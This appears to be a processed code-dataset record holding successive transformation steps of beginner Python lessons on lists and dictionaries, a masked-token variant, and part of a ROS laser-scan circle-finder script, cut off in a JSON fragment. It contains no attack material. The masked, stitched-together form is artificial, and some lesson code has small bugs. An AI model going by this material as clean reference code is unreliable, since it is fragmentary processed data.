"step-3": "print(\"\"\"\n1. Lists of Numbers\"\"\")\nprint('\\t' + str([1, 2, 3]))\nprint(\"\"\"\n2. Lists of Strings\"\"\")\nprint('\\t' + str(['Lemon', 'Mango', 'Papaya']))\nlist_fruits = ['Lemon', 'Mango', 'Papaya']\nprint('\\tMy favorite fruit is ' + list_fruits[1])\nprint(\"\"\"\n3. List operations\"\"\")\nlist_fruits[2] = 'Water Melons'\nprint('\\tNew List: ' + str(list_fruits))\nlist_Organizations = []\nprint(\"\"\"\n5. Create empty list\"\"\")\nprint('\\tList of Organizations: ' + str(list_Organizations))\nprint(\"\"\"\n5. Add values to list\"\"\")\nlist_Organizations.append('Microsoft')\nlist_Organizations.append('Amazon')\nlist_Organizations.append('Google')\nprint('\\tAppend List of Organizations: ' + str(list_Organizations))\nprint('\\tList of characters in string:' + str(list('Sandeep Dhamale')))\nprint(\"\"\"\n6. Retrieve List using for loop\"\"\")\nfor organization in list_Organizations:\n print('\\t' + organization)\nprint(\"\"\"\n7. Get specific elements within list: Slicing\"\"\")\nlist_numbers = [1, 2, 3, 4, 5]\nsub_list_numbers = list_numbers[1:3]\nprint('\\tSub list: ' + str(sub_list_numbers))\nprint('\\tLast element in list: ' + str(list_numbers[-1]))\nprint('\\tGet all elements in list except first and lasr: ' + str(\n list_numbers[1:-1]))\nprint('\\tElements from index 2 in list: ' + str(list_numbers[2:]))\nprint('\\tElements till index 4 in list: ' + str(list_numbers[:4]))\nprint(\"\"\"\n8. Copying Lists to other list\"\"\")\nlist_numbers_direct = list_numbers\nprint('\\tUsing assignment. Is list_numbers_direct is list_numbers ' + str(\n list_numbers_direct is list_numbers))\nlist_numbers_list_values = list_numbers[:]\nprint('\\tUsing assignment. Is list_numbers_list_values is list_numbers ' +\n str(list_numbers_list_values is list_numbers))\nlist_numbers_copy = list_numbers.copy()\nprint('\\tUsing assignment. Is list_numbers_copy is list_numbers ' + str(\n list_numbers_copy is list_numbers))\nlist_numbers_list = list(list_numbers)\nprint('\\tUsing assignment. Is list_numbers_list is list_numbers ' + str(\n list_numbers_list is list_numbers))\nprint(\n \"\"\"\n9. Note: Although the copies are not equal the objects inside the lists are equal\"\"\"\n )\nlist_of_list = [[1, 2], [3, 4]]\ncopy_list_of_list = list_of_list[:]\nprint('\\tcopy_list_of_list is list_of_list: ' + str(copy_list_of_list is\n list_of_list))\nprint('\\tcopy_list_of_list[element] is list_of_list[element]: ' + str(\n copy_list_of_list[0] is list_of_list[0]))\nprint('\\tEven if the values are modified e.g. append the list will be same')\nlist_of_list[0].append('a')\nprint('\\tlist_of_list: ' + str(list_of_list))\nprint('\\tcopy_list_of_list: ' + str(copy_list_of_list))\nprint('\\tcopy_list_of_list[element] is list_of_list[element]: ' + str(\n copy_list_of_list[0] is list_of_list[0]))\nprint(\n \"\"\"\n10.Search in a list: list.index() - Returns the first matched element\"\"\"\n )\ntemp_string = (\n 'Python is easy scripting language. It is easy to learn and build apps using Python.'\n )\ntemp_string_list = temp_string.split(' ')\nprint('\\tString: ' + temp_string)\nprint('\\tString list: ' + str(temp_string_list))\nprint('\\tSearch a sub string in string list using list.index(): ' + str(\n temp_string_list.index('scripting')))\nprint(\"\"\"\n11.Count occurrence of substring in list\"\"\")\nprint('\\tCount occurrence of substring Python: ' + str(temp_string_list.\n count('easy')))\nprint(\"\"\"\n12.Remove substring from string list\"\"\")\ndel temp_string_list[3]\nprint('\\tA. 
Remove substring from list using del (by index): ' + str(\n temp_string_list))\nprint('\\tOriginal string is unaffected: ' + str(temp_string))\ntemp_string_list.remove('learn')\nprint('\\tB. Remove substring from list using remove (by value): ' + str(\n temp_string_list))\nprint('\\tOriginal string is unaffected: ' + str(temp_string))\nprint(\"\"\"\n12.Insert a substring in string. list.insert()\"\"\")\ntemp_string_list.insert(3, 'scripting')\nprint('\\tA. Insert substring to list (at index): ' + str(temp_string_list))\nprint('\\tOriginal string is unaffected: ' + str(temp_string))\nprint(\"\"\"\n13.Concatenating lists.\"\"\")\ntemp_list_1 = [1, 2, 3]\ntemp_list_2 = [4, 5, 6]\ntemp_list = temp_list_1 + temp_list_2\nprint('\\ta. temp_list = temp_list_1 + temp_list_2 = ' + str(temp_list))\ntemp_list += temp_list\nprint('\\tb. temp_list += temp_list ' + str(temp_list))\ntemp_list.extend([7, 8, 9])\nprint('\\tc. temp_list.extend() ' + str(temp_list))\nprint(\"\"\"\n14. Reversing lists.\"\"\")\ntemp_list.reverse()\nprint('Reverse temp list: ' + str(temp_list))\nprint(\"\"\"\n15. Sorting lists.\"\"\")\ntemp_list = [5, 55, 555]\ntemp_list.sort()\nprint('\\tSorted list: ' + str(temp_list))\ntemp_list.sort(reverse=True)\nprint('\\tSorted list: ' + str(temp_list))\nprint(\"\\tSorting lists by callable functions (inbuilt) e.g. len using 'key\")\ntemp_string = 'I am a software tester.'\ntemp_string_list = temp_string.split()\nprint('\\tString list: ' + str(temp_string_list))\ntemp_string_list.sort(key=len)\nprint('\\tSort by length of each word: ' + str(temp_string_list))\ntemp_number_list = [3, 45, 12, 1, 99, 44]\nprint(\n \"\"\"\n16. Using Sorted (copy of sort) instead of sort. and reversed to avoid modifications in original list.\"\"\"\n )\nx = [4, 9, 2, 1]\ny = x\ny.sort()\nprint('\\t y= ' + str(y))\nprint('\\t x= ' + str(x))\nx = [4, 9, 2, 1]\nprint('\\t y= ' + str(sorted(x)))\nprint('\\t x= ' + str(x))\nprint('\\t z= ' + str(list(reversed(x))))\nprint('\\t x= ' + str(x))\n",
"step-4": "# Lists are sequence of objects\n# Mutable\n# Lists are represented within square brackets and items are seperated by commas\n\n#-----------------------------------Lists-----------------------------------#\n# Lists of Numbers\nprint(\"\\n1. Lists of Numbers\")\nprint(\"\\t\" + str([1,2,3]))\n\n# Lists of Strings\nprint(\"\\n2. Lists of Strings\")\nprint(\"\\t\" + str([\"Lemon\",\"Mango\",\"Papaya\"]))\n\nlist_fruits =[\"Lemon\",\"Mango\",\"Papaya\"]\nprint(\"\\tMy favorite fruit is \" + list_fruits[1])\n\nprint(\"\\n3. List operations\")\n#Replace items within list\nlist_fruits[2]=\"Water Melons\"\nprint(\"\\tNew List: \" + str(list_fruits))\n\n#Create Empty List\nlist_Organizations = []\nprint(\"\\n5. Create empty list\")\nprint(\"\\tList of Organizations: \" + str(list_Organizations))\n\n#Add values to list\nprint(\"\\n5. Add values to list\")\nlist_Organizations.append(\"Microsoft\")\nlist_Organizations.append(\"Amazon\")\nlist_Organizations.append(\"Google\")\nprint(\"\\tAppend List of Organizations: \" + str(list_Organizations))\n\n#List of characters within string\nprint(\"\\tList of characters in string:\" + str(list(\"Sandeep Dhamale\")))\n\n# Retrieve List using for loop\nprint(\"\\n6. Retrieve List using for loop\")\nfor organization in list_Organizations:\n print(\"\\t\" + organization)\n\n# Get specific elements within list: Slicing\nprint(\"\\n7. Get specific elements within list: Slicing\")\nlist_numbers = [1,2,3,4,5]\nsub_list_numbers = list_numbers[1:3]\nprint(\"\\tSub list: \" + str(sub_list_numbers))\nprint(\"\\tLast element in list: \" + str(list_numbers[-1]))\nprint(\"\\tGet all elements in list except first and lasr: \" + str(list_numbers[1:-1]))\nprint(\"\\tElements from index 2 in list: \" + str(list_numbers[2:]))\nprint(\"\\tElements till index 4 in list: \" + str(list_numbers[:4]))\n\n#Copying Lists to other list - Shallow copy\nprint(\"\\n8. Copying Lists to other list\")\nlist_numbers_direct = list_numbers\nprint(\"\\tUsing assignment. Is list_numbers_direct is list_numbers \" + str(list_numbers_direct is list_numbers))\n\nlist_numbers_list_values = list_numbers[:]\nprint(\"\\tUsing assignment. Is list_numbers_list_values is list_numbers \" + str(list_numbers_list_values is list_numbers))\n\nlist_numbers_copy = list_numbers.copy()\nprint(\"\\tUsing assignment. Is list_numbers_copy is list_numbers \" + str(list_numbers_copy is list_numbers))\n\nlist_numbers_list = list(list_numbers)\nprint(\"\\tUsing assignment. Is list_numbers_list is list_numbers \" + str(list_numbers_list is list_numbers))\n\nprint(\"\\n9. Note: Although the copies are not equal the objects inside the lists are equal\")\nlist_of_list = [[1,2],[3,4]]\ncopy_list_of_list = list_of_list[:]\nprint(\"\\tcopy_list_of_list is list_of_list: \" + str(copy_list_of_list is list_of_list))\nprint(\"\\tcopy_list_of_list[element] is list_of_list[element]: \" + str(copy_list_of_list[0] is list_of_list[0]))\nprint(\"\\tEven if the values are modified e.g. append the list will be same\")\nlist_of_list[0].append('a')\nprint(\"\\tlist_of_list: \" + str(list_of_list))\nprint(\"\\tcopy_list_of_list: \" + str(copy_list_of_list))\nprint(\"\\tcopy_list_of_list[element] is list_of_list[element]: \" + str(copy_list_of_list[0] is list_of_list[0]))\n\nprint(\"\\n10.Search in a list: list.index() - Returns the first matched element\")\ntemp_string = \"Python is easy scripting language. 
It is easy to learn and build apps using Python.\"\ntemp_string_list = temp_string.split(\" \")\nprint(\"\\tString: \" + temp_string)\nprint(\"\\tString list: \" + str(temp_string_list))\nprint(\"\\tSearch a sub string in string list using list.index(): \" + str(temp_string_list.index(\"scripting\")))\n\nprint(\"\\n11.Count occurrence of substring in list\")\nprint(\"\\tCount occurrence of substring Python: \" + str(temp_string_list.count(\"easy\")))\n\nprint(\"\\n12.Remove substring from string list\")\ndel temp_string_list[3]\nprint(\"\\tA. Remove substring from list using del (by index): \" + str(temp_string_list))\nprint(\"\\tOriginal string is unaffected: \" + str(temp_string))\n\ntemp_string_list.remove(\"learn\")\nprint(\"\\tB. Remove substring from list using remove (by value): \" + str(temp_string_list))\nprint(\"\\tOriginal string is unaffected: \" + str(temp_string))\n\nprint(\"\\n12.Insert a substring in string. list.insert()\")\ntemp_string_list.insert(3, \"scripting\")\nprint(\"\\tA. Insert substring to list (at index): \" + str(temp_string_list))\nprint(\"\\tOriginal string is unaffected: \" + str(temp_string))\n\nprint(\"\\n13.Concatenating lists.\")\ntemp_list_1=[1,2,3]\ntemp_list_2 = [4,5,6]\ntemp_list = temp_list_1 + temp_list_2\nprint(\"\\ta. temp_list = temp_list_1 + temp_list_2 = \" + str(temp_list))\ntemp_list+=temp_list\nprint(\"\\tb. temp_list += temp_list \" + str(temp_list))\ntemp_list.extend([7,8,9])\nprint(\"\\tc. temp_list.extend() \" + str(temp_list))\n\nprint(\"\\n14. Reversing lists.\")\ntemp_list.reverse()\nprint(\"Reverse temp list: \"+ str(temp_list))\n\nprint(\"\\n15. Sorting lists.\")\ntemp_list = [5,55,555]\ntemp_list.sort()\nprint(\"\\tSorted list: \" + str(temp_list))\ntemp_list.sort(reverse=True)\nprint(\"\\tSorted list: \" + str(temp_list))\nprint(\"\\tSorting lists by callable functions (inbuilt) e.g. len using 'key\")\ntemp_string = \"I am a software tester.\"\ntemp_string_list = temp_string.split()\nprint(\"\\tString list: \" + str(temp_string_list))\ntemp_string_list.sort(key=len)\nprint(\"\\tSort by length of each word: \" + str(temp_string_list))\ntemp_number_list=[3,45,12,1,99,44]\n\nprint(\"\\n16. Using Sorted (copy of sort) instead of sort. and reversed to avoid modifications in original list.\")\nx=[4, 9, 2, 1]\ny = x\ny.sort()\nprint(\"\\t y= \" + str(y))\nprint(\"\\t x= \" + str(x))\n\nx=[4, 9, 2, 1]\nprint(\"\\t y= \" + str(sorted(x)))\nprint(\"\\t x= \" + str(x))\nprint(\"\\t z= \" + str(list(reversed(x))))\nprint(\"\\t x= \" + str(x))\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
print('dict_test: ', dict_test)
<|reserved_special_token_0|>
for key in range(0, int(elem_dict)):
key = input('dict key: ')
user_input_dict[key] = input('dict value:')
print(user_input_dict)
<|reserved_special_token_0|>
dict_test.pop(int(del_key))
print(dict_test)
<|reserved_special_token_0|>
print(list_test)
try:
print(list_test[5])
except IndexError as message:
print('list index out of range')
try:
print(dict_test[7])
except KeyError as message:
dict_test[7] = 'KeyError: 7'
print(dict_test)
<|reserved_special_token_0|>
while work == True:
    print('Your personal database is running; current records:')
print(user_dict)
    print('if you want to add a record press 1')
    print('if you want to delete a record press 2')
    print('if you want to change a record press 3')
    print('if you want to exit press 4')
user_numb = input()
if user_numb.isdigit() == False:
continue
if int(user_numb) == 1:
print('write key of record:')
key = input()
print('write value for your key:')
value = input()
if key.isdigit() == True:
key = int(key)
if value.isdigit() == True:
value = int(value)
user_dict.update({key: value})
elif int(user_numb) == 2:
print(user_dict)
        print('which record number do you want to delete?')
del_key = input()
if del_key.isdigit() == False:
            print('This is not a correct number!')
continue
elif int(del_key) > len(user_dict) or int(del_key) <= 0:
            print('Your base does not have this number!')
continue
        user_dict.pop(int(del_key) - 1)
elif int(user_numb) == 3:
        print('Which record number do you want to change?')
reg_key = input()
if reg_key.isdigit() == False:
            print('This is not a number!')
continue
elif int(reg_key) > len(user_dict) or int(reg_key) <= 0:
            print("Your base doesn't have this number!")
continue
print('write value for your key:')
value = input()
if value.isdigit() == True:
value = int(value)
user_dict[int(reg_key) - 1] = value
elif int(user_numb) == 4:
work = False
else:
        print('invalid input, please enter a valid number!')
<|reserved_special_token_1|>
my_information = {'name': 'Vilen', 'last_name': 'Mateush', 'how_old': 31,
'born_town': 'Khmelniysky'}
dict_test = {key: (key ** 2) for key in range(7)}
print('dict_test: ', dict_test)
elem_dict = 0
elem_dict = input('input number of elements:')
user_input_dict = {}
for key in range(0, int(elem_dict)):
key = input('dict key: ')
user_input_dict[key] = input('dict value:')
print(user_input_dict)
del_key = 0
del_key = input('input key for remove:')
dict_test.pop(int(del_key))
print(dict_test)
list_test = [elem for elem in range(5)]
print(list_test)
try:
print(list_test[5])
except IndexError as message:
print('list index out of range')
try:
print(dict_test[7])
except KeyError as message:
dict_test[7] = 'KeyError: 7'
print(dict_test)
work = True
user_dict = {}
user_numb = 0
while work == True:
    print('Your personal database is running; current records:')
print(user_dict)
    print('if you want to add a record press 1')
    print('if you want to delete a record press 2')
    print('if you want to change a record press 3')
    print('if you want to exit press 4')
user_numb = input()
if user_numb.isdigit() == False:
continue
if int(user_numb) == 1:
print('write key of record:')
key = input()
print('write value for your key:')
value = input()
if key.isdigit() == True:
key = int(key)
if value.isdigit() == True:
value = int(value)
user_dict.update({key: value})
elif int(user_numb) == 2:
print(user_dict)
        print('which record number do you want to delete?')
del_key = input()
if del_key.isdigit() == False:
            print('This is not a correct number!')
continue
elif int(del_key) > len(user_dict) or int(del_key) <= 0:
            print('Your base does not have this number!')
continue
        user_dict.pop(int(del_key) - 1)
elif int(user_numb) == 3:
        print('Which record number do you want to change?')
reg_key = input()
if reg_key.isdigit() == False:
            print('This is not a number!')
continue
elif int(reg_key) > len(user_dict) or int(reg_key) <= 0:
            print("Your base doesn't have this number!")
continue
print('write value for your key:')
value = input()
if value.isdigit() == True:
value = int(value)
user_dict[int(reg_key) - 1] = value
elif int(user_numb) == 4:
work = False
else:
        print('invalid input, please enter a valid number!')
<|reserved_special_token_1|>
# lesson 4 Mateush Vilen
my_information = {
'name': 'Vilen',
'last_name': 'Mateush',
'how_old': 31,
'born_town': 'Khmelniysky'
}
dict_test = {key: key**2 for key in range(7)}
print('dict_test: ', dict_test)
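# Illustrative sketch (an addition): the comprehension above is equivalent to
# this plain loop; the assert just confirms both build the same mapping.
dict_loop = {}
for key in range(7):
    dict_loop[key] = key ** 2
assert dict_loop == dict_test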
elem_dict = 0
elem_dict = input('input number of elements:')
user_input_dict = {}
for key in range(0, int(elem_dict)):
key = input('dict key: ')
user_input_dict[key] = input('dict value:')
print(user_input_dict)
del_key = 0
del_key = input('input key for remove:')
dict_test.pop(int(del_key))
print(dict_test)
list_test = [elem for elem in range(5)]
print(list_test)
try:
print(list_test[5])
except IndexError as message:
print('list index out of range')
try:
print(dict_test[7])
except KeyError as message:
dict_test[7] = 'KeyError: 7'
print(dict_test)
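# Hedged aside (not part of the original exercise): dict.get() and
# dict.setdefault() avoid the try/except dance for possibly-missing keys.
print(dict_test.get(42, 'no such key'))   # returns the default instead of raising
dict_test.setdefault(8, 'KeyError: 8')    # inserts only if the key is absent
print(dict_test)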
# ------------My database------------:
work = True
user_dict = {}
user_numb = 0
while work == True:
    print('Your personal database is running; current records:')
print(user_dict)
    print('if you want to add a record press 1')
    print('if you want to delete a record press 2')
    print('if you want to change a record press 3')
    print('if you want to exit press 4')
user_numb = input()
if user_numb.isdigit() == False:
continue
if int(user_numb) == 1:
print('write key of record:')
key = input()
print('write value for your key:')
value = input()
if key.isdigit() == True:
key = int(key)
if value.isdigit() == True:
value = int(value)
user_dict.update({key: value})
elif int(user_numb) == 2:
print(user_dict)
        print('which record number do you want to delete?')
del_key = input()
if del_key.isdigit() == False:
            print('This is not a correct number!')
continue
elif int(del_key) > len(user_dict) or int(del_key) <= 0:
            print('Your base does not have this number!')
continue
        user_dict.pop(int(del_key)-1)
elif int(user_numb) == 3:
        print('Which record number do you want to change?')
reg_key = input()
if reg_key.isdigit() == False:
            print('This is not a number!')
continue
elif int(reg_key) > len(user_dict) or int(reg_key) <= 0:
            print("Your base doesn't have this number!")
continue
print('write value for your key:')
value = input()
if value.isdigit() == True:
value = int(value)
user_dict[int(reg_key)-1] = value
elif int(user_numb) == 4:
work = False
else:
        print('invalid input, please enter a valid number!')
|
flexible
|
{
"blob_id": "b000f293b50970233d5b71abc3e10e2ad57a3fc7",
"index": 1767,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint('dict_test: ', dict_test)\n<mask token>\nfor key in range(0, int(elem_dict)):\n key = input('dict key: ')\n user_input_dict[key] = input('dict value:')\nprint(user_input_dict)\n<mask token>\ndict_test.pop(int(del_key))\nprint(dict_test)\n<mask token>\nprint(list_test)\ntry:\n print(list_test[5])\nexcept IndexError as message:\n print('list index out of range')\ntry:\n print(dict_test[7])\nexcept KeyError as message:\n dict_test[7] = 'KeyError: 7'\nprint(dict_test)\n<mask token>\nwhile work == True:\n print('Your personal database is work, you have this base:')\n print(user_dict)\n print('if you want add record press 1')\n print('if you wand delete record press 2')\n print('if you wand change record press 3')\n print('if you want exit press 4')\n user_numb = input()\n if user_numb.isdigit() == False:\n continue\n if int(user_numb) == 1:\n print('write key of record:')\n key = input()\n print('write value for your key:')\n value = input()\n if key.isdigit() == True:\n key = int(key)\n if value.isdigit() == True:\n value = int(value)\n user_dict.update({key: value})\n elif int(user_numb) == 2:\n print(user_dict)\n print('what number of record you want to delete?')\n del_key = input()\n if del_key.isdigit() == False:\n print('This is not correct number!')\n continue\n elif int(del_key) > len(user_dict) or int(del_key) <= 0:\n print('Your base doesnot have this number!')\n continue\n user_dict.pop(int(del_key) + 1)\n elif int(user_numb) == 3:\n print('What number of record you want to change?')\n reg_key = input()\n if reg_key.isdigit() == False:\n print('This is not number!')\n continue\n elif int(reg_key) > len(user_dict) or int(reg_key) <= 0:\n print('Your base doesnt have this number!')\n continue\n print('write value for your key:')\n value = input()\n if value.isdigit() == True:\n value = int(value)\n user_dict[int(reg_key) - 1] = value\n elif int(user_numb) == 4:\n work = False\n else:\n print('your input false, please write true number!')\n",
"step-3": "my_information = {'name': 'Vilen', 'last_name': 'Mateush', 'how_old': 31,\n 'born_town': 'Khmelniysky'}\ndict_test = {key: (key ** 2) for key in range(7)}\nprint('dict_test: ', dict_test)\nelem_dict = 0\nelem_dict = input('input number of elements:')\nuser_input_dict = {}\nfor key in range(0, int(elem_dict)):\n key = input('dict key: ')\n user_input_dict[key] = input('dict value:')\nprint(user_input_dict)\ndel_key = 0\ndel_key = input('input key for remove:')\ndict_test.pop(int(del_key))\nprint(dict_test)\nlist_test = [elem for elem in range(5)]\nprint(list_test)\ntry:\n print(list_test[5])\nexcept IndexError as message:\n print('list index out of range')\ntry:\n print(dict_test[7])\nexcept KeyError as message:\n dict_test[7] = 'KeyError: 7'\nprint(dict_test)\nwork = True\nuser_dict = {}\nuser_numb = 0\nwhile work == True:\n print('Your personal database is work, you have this base:')\n print(user_dict)\n print('if you want add record press 1')\n print('if you wand delete record press 2')\n print('if you wand change record press 3')\n print('if you want exit press 4')\n user_numb = input()\n if user_numb.isdigit() == False:\n continue\n if int(user_numb) == 1:\n print('write key of record:')\n key = input()\n print('write value for your key:')\n value = input()\n if key.isdigit() == True:\n key = int(key)\n if value.isdigit() == True:\n value = int(value)\n user_dict.update({key: value})\n elif int(user_numb) == 2:\n print(user_dict)\n print('what number of record you want to delete?')\n del_key = input()\n if del_key.isdigit() == False:\n print('This is not correct number!')\n continue\n elif int(del_key) > len(user_dict) or int(del_key) <= 0:\n print('Your base doesnot have this number!')\n continue\n user_dict.pop(int(del_key) + 1)\n elif int(user_numb) == 3:\n print('What number of record you want to change?')\n reg_key = input()\n if reg_key.isdigit() == False:\n print('This is not number!')\n continue\n elif int(reg_key) > len(user_dict) or int(reg_key) <= 0:\n print('Your base doesnt have this number!')\n continue\n print('write value for your key:')\n value = input()\n if value.isdigit() == True:\n value = int(value)\n user_dict[int(reg_key) - 1] = value\n elif int(user_numb) == 4:\n work = False\n else:\n print('your input false, please write true number!')\n",
"step-4": "# lesson 4 Mateush Vilen\n\nmy_information = {\n 'name': 'Vilen',\n 'last_name': 'Mateush',\n 'how_old': 31,\n 'born_town': 'Khmelniysky'\n}\n\ndict_test = {key: key**2 for key in range(7)}\nprint('dict_test: ', dict_test)\n\nelem_dict = 0\nelem_dict = input('input number of elements:')\nuser_input_dict = {}\nfor key in range(0, int(elem_dict)):\n key = input('dict key: ')\n user_input_dict[key] = input('dict value:')\nprint(user_input_dict)\n\ndel_key = 0\ndel_key = input('input key for remove:')\ndict_test.pop(int(del_key))\nprint(dict_test)\n\nlist_test = [elem for elem in range(5)]\nprint(list_test)\ntry:\n print(list_test[5])\nexcept IndexError as message:\n print('list index out of range')\n\ntry:\n print(dict_test[7])\nexcept KeyError as message:\n dict_test[7] = 'KeyError: 7'\nprint(dict_test)\n\n\n# ------------My database------------:\nwork = True\nuser_dict = {}\nuser_numb = 0\nwhile work == True:\n print('Your personal database is work, you have this base:')\n print(user_dict)\n print('if you want add record press 1')\n print('if you wand delete record press 2')\n print('if you wand change record press 3')\n print('if you want exit press 4')\n user_numb = input()\n if user_numb.isdigit() == False:\n continue\n if int(user_numb) == 1:\n print('write key of record:')\n key = input()\n print('write value for your key:')\n value = input()\n if key.isdigit() == True:\n key = int(key)\n if value.isdigit() == True:\n value = int(value)\n user_dict.update({key: value})\n elif int(user_numb) == 2:\n print(user_dict)\n print('what number of record you want to delete?')\n del_key = input()\n if del_key.isdigit() == False:\n print('This is not correct number!')\n continue\n elif int(del_key) > len(user_dict) or int(del_key) <= 0:\n print('Your base doesnot have this number!')\n continue\n user_dict.pop(int(del_key)+1)\n elif int(user_numb) == 3:\n print('What number of record you want to change?')\n reg_key = input()\n if reg_key.isdigit() == False:\n print('This is not number!')\n continue\n elif int(reg_key) > len(user_dict) or int(reg_key) <= 0:\n print('Your base doesnt have this number!')\n continue\n print('write value for your key:')\n value = input()\n if value.isdigit() == True:\n value = int(value)\n user_dict[int(reg_key)-1] = value\n elif int(user_numb) == 4:\n work = False\n else:\n print('your input false, please write true number!')\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
#!/usr/bin/env python
#-------------------------------------------------------------------------------
#
# Circle finder.
#
# Rowan Leeder
#
#-------------------------------------------------------------------------------
#
# Listens on the 'scan' and 'base_scan' topics. These are the Pioneer's SICK
# topic and Stage's scan topic, respectively.
#
# The program strips out noise samples and attempts to match circles to the
# remaining samples.
#
# Any circle that is found is then published on the 'circles' topic in a
# circleArray message.
#
# The circleArray and circleEntry messages are defined in the msg\ folder.
#
#-------------------------------------------------------------------------------
#
# Compile Commands:
#
# First run 'rosmake' in the base directory. If you change the messages in any
# way then you will have to close all ros components using the topic (basically
# everything) and then recompile with rosmake. If you add a message, add an
# entry to the manifest file.
#
# To run this program do 'rosrun circleFinder finder.py'.
#
# Exit with Ctrl + C.
#
# Listen in with 'rostopic echo circles'
#
# If you want to see a plot of the data, set the 'plot' variable to True.
#
#-------------------------------------------------------------------------------
# Known Bugs:
# If the laser scan covers 360 degrees then you might get two circles at the
# same spot. This is because I haven't joined the two ends of the scan together.
# This will not be an issue with the robots as they only take 180 degree scans.
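#
# A hedged sketch of one possible fix (an assumed helper, not implemented in
# this file): when the scan does wrap a full 360 degrees, merge the first and
# last sample groups before circle fitting whenever their end points are close:
#
#   def join_wraparound(groups, tol):
#       if len(groups) > 1:
#           dx = groups[0][0][0] - groups[-1][-1][0]
#           dy = groups[0][0][1] - groups[-1][-1][1]
#           if math.hypot(dx, dy) < tol:
#               groups[0] = groups[-1] + groups[0]
#               groups.pop()
#       return groups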
# Ros imports.
import roslib;
roslib.load_manifest('circleFinder')
import rospy
from sensor_msgs.msg import LaserScan
from roslib.rostime import Duration
# Python lib imports.
import math
import time
# Message imports
from circleFinder.msg import *
# Local file imports.
from placment_funcs import *
from data_parser import *
# Plot functions are in here. Remove this import if you don't want plotting;
# doing so might free up some memory.
from plot_funcs import *
#-------------------------------------------------------------------------------
# Function: callback
#
# Thread created when a laser scan is received on a listening topic and extract
# and publish a specified number of circle from the data.
#
#-------------------------------------------------------------------------------
#
# args - An array of arguments. The form is:
# max_dist - the maximum distance to look for circles. If a sample or
# circle edge goes beyond this then it will be ignored.
# max_rad - The maximum radius that a valid circle can have.
# min_rad - The minimum radius that a valid circle can have.
# grad_tol - The tolerance used in the prune function.
# split_multi - The multiplier used in the split function
#
# publish - A circleArray object containing the circle data in an array of
# circleEntry objects. These classes are defined in the
# circleFinder/msg path.
#-------------------------------------------------------------------------------
def callback(data, args):
tStart = time.time()
pub = args[0]
max_dist = args[1]
max_rad = args[2]
min_rad = args[3]
grad_tol = args[4]
split_multi = args[5]
prune_lines = args[6]
plot = args[7]
# Get possible circle data.
possibles = dataParser(data,max_dist, grad_tol, split_multi, prune_lines)
# Calculate the circle info from that data.
circles = []
for i in possibles:
current = matchCirc(list(i), False)
if current is not None:
#prune out any circles that are too large or small
if current[1] > max_rad or \
current[1] < min_rad or \
math.sqrt(math.pow(current[0][0],2) + math.pow(current[0][1],2)) + current[1] > max_dist:
pass
else:
circles.append(current)
# Setup circleArray and publish found circles.
ret = []
for i in circles:
c = circleEntry()
c.x = i[0][0]
c.y = i[0][1]
c.distance = math.sqrt(i[0][0]*i[0][0] + i[0][1] * i[0][1])
c.theta = math.atan2(i[0][1], i[0][0])
c.radius = i[1]
ret.append(c)
m = circleArray()
m.broadcastTime = rospy.get_rostime()
m.duration = time.time() - tStart
m.array = ret
if not rospy.is_shutdown():
pub.publish(m)
if plot:
import matplotlib.pyplot as plt
plotWorld(data, 30, True, 'ro')
for i in circles:
plotCircle((i[0])[0],(i[0])[1],i[1])
for i in possibles:
for u in i:
plt.plot(u[0], u[1], 'bo')
plt.plot(0,0,'ro')
plotAxis(8,-8,8,-8,4)
plt.axis([-8,8,-8,8])
plt.show()
#-------------------------------------------------------------------------------
# Function: main
#
# Sets up the callback function and then idles.
#
# Program arguments are inside.
#
#-------------------------------------------------------------------------------
if __name__ == '__main__':
#print dir()
    # the publisher
pub = rospy.Publisher("circles", circleArray)
# The maximum distance from the origin that a sample point or circle edge
# can be before they are considered invalid.
max_dist = 7
# The maximum radius a circle can be before it is considered invalid.
max_rad = 0.25
    # The minimum radius a circle can have before it is considered invalid.
min_rad = 0
# See the prune function in data_parser.py
grad_tol = 0.3
# See the split function in data_parser.py
split_multi = 2.5
# If true then an attempt to remove straight edges from the data will be
# made.
prune_lines = True
# Plot flag.
plot = False
import sys
if (len(sys.argv) > 1):
for i in sys.argv:
if i == '--plot':
plot = True
elif i == '--no-line-pruning':
prune_lines = False
args = [pub, max_dist, max_rad, min_rad, grad_tol, split_multi, prune_lines , plot]
print "--------------------------------------------------------------------------------"
print "Circle Finder"
print
print "--------------------------------------------------------------------------------"
print "Command line arguments are:"
print " --plot Will cause the outcome of the first scan to be plotted."
print " --no-line-pruning Will prevent straight lines from being removed from the"
print " scan."
print
print "--------------------------------------------------------------------------------"
print "Starting circle finder with arguments:"
print
print " Publisher: " , pub
print " Maximum Distance: " , max_dist
print " Maximum Radius: " , max_rad
print " Minimum Radius: " , min_rad
print " Gradient Tolerance: " , grad_tol
print " Split Multiplier: " , split_multi
print " Remove Lines: " , prune_lines
print " Plot: " , plot
print
print "--------------------------------------------------------------------------------"
print "To increase speed, the listening thread is not verbose."
print "Ctrl+C to exit."
rospy.init_node('circles', anonymous=True)
rospy.Subscriber("base_scan",LaserScan, callback, callback_args=args)
rospy.Subscriber("scan",LaserScan, callback, callback_args=args)
rospy.spin()
|
normal
|
{
"blob_id": "3ac02308959749b8cd264e660c3d6334fd385fd4",
"index": 1114,
"step-1": "#!/usr/bin/env python\n#-------------------------------------------------------------------------------\n#\n# Circle finder.\n#\n# Rowan Leeder\n#\n#-------------------------------------------------------------------------------\n#\n# Listens on the 'scan' and 'base_scan' topics. These are the pioneers SICK\n# topic and Stage's scan topic respectively.\n#\n# The program strips out noise samples and attempts to match circles to the\n# remaining samples.\n#\n# Any circle that is found is then published on the 'circles' topic in a\n# circleArray message.\n#\n# The circleArray and circleEntry messages are defined in the msg\\ folder.\n#\n#-------------------------------------------------------------------------------\n#\n# Compile Commands:\n#\n# First run 'rosmake' in the base directory. If you change the messages in any\n# way then you will have to close all ros components using the topic (basically\n# everything) and then recompile with rosmake. If you add a message, add an \n# entry to the manifest file. \n#\n# To run this program do 'rosrun circleFinder finder.py'. \n#\n# Exit with Ctrl + C.\n#\n# Listen in with 'rostopic echo circles'\n#\n# If you want to see a plot of the data, set the 'plot' variable to True.\n#\n#-------------------------------------------------------------------------------\n# Known Bugs:\n# If the laser scan covers 360 degrees then you might get two circles at the \n# same spot. This is becuase i haven't joined 